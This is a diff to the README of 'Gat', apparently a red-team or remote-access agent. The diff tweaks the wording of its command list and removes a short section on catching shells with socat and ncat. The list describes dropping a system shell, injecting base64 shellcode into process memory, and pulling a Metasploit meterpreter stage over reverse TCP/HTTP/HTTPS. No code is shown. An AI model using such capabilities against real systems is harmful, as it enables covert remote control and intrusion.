m1ddl3w4r3/Gat/README.md

 * ``shell`` : drops you an system shell (allowing you, for example, to change directories)
 * ``inject <base64 shellcode>`` : injects a shellcode (base64 encoded) in the same process memory, and executes it
-* ``meterpreter [tcp|http|https] IP:PORT`` : connects to a multi/handler to get a stage2 reverse tcp, http or https malleable agent from metasploit, and execute the shellcode in memory (Windows only at the moment)
+* ``meterpreter [tcp|http|https] IP:PORT`` : connects to a multi/handler to get a stage2 reverse tcp, http or https meterpreter agent from metasploit, and execute the shellcode in memory (Windows only at the moment)
 * ``exit`` : exit gracefully

 ## Examples

 ### Basic usage

-One can use various tools to handle incomming connections, by default Gat will use 'MSF's Multi Handler' for default shell catcher.\
-These shells can be upgraded to meterpreter shells using the 'meterpreter' command in Gat.

-Other options are available to catch shells and upgrade to 'meterpreter' such as:

-*socat\
-*ncat

 ## Meterpreter staging
 **WARNING**: this currently only work for the Windows platform.